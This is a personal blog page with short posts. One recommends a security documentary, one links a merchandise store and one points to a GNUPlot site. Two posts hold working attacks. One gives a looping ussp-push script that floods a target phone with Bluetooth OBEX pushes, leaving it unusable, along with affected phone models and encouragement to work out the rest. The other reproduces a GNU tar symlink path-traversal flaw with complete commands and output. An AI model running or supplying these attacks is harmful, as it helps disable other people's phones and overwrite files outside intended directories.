sheepy.org - sheepy goings on...

[Watch on youtube]

Well worth watching if you are at all interested in security.

Its a documentary on the "Security" measures that the british goverment are putting in place, making you think if they are really a "good thing".

For hard core tech people, features include:

• RFID Exploits (including UK Passports)
• CCTV Security
• Wireless Security
• Mobile Phone exploits

Enjoy!

DoS your mobile phone with lots of Obex pushes. It would seem that most mobiles force you to either accept or deny the push, this disables any other usage of the phone including the ability to turn off bluetooth.

This has apparently been confirmed on the following phones:

• Sony Ericsson K700i
• Nokia N70
• Motorola MOTORAZR V3
• Sony Ericsson W810i
• LG Chocolate KG800

No doubt many other phones are effected.

Attached is the current release of the ussp-push program which uses the Bluez bluetooth stack to do a Obex push.

All that is required is a wrapper script of the form:

while true
do
        ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done

You can work the rest out yourself...

Started a cafepress store.

Find goodies at http://www.afepress.com/cowjuice

Excellent site on GNUPlot

Just when you thought you were safe...

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html

Have tested this and it works as described:

nathan@holly /tmp $ tar --version
tar (GNU tar) 1.15.1
nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar
nathan@holly /tmp $ mkdir -p xyz/home/foo
nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt
nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo
nathan@holly /tmp $ rootdo mkdir /home/foo
nathan@holly /tmp $ rootdo chown nathan /home/foo
nathan@holly /tmp $ rm -rf xyz
nathan@holly /tmp $ tar -xf foo.tar
nathan@holly /tmp $ ls -l xyz
lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> /
nathan@holly /tmp $ cat /home/foo/hello.txt
Hello
nathan@holly /tmp $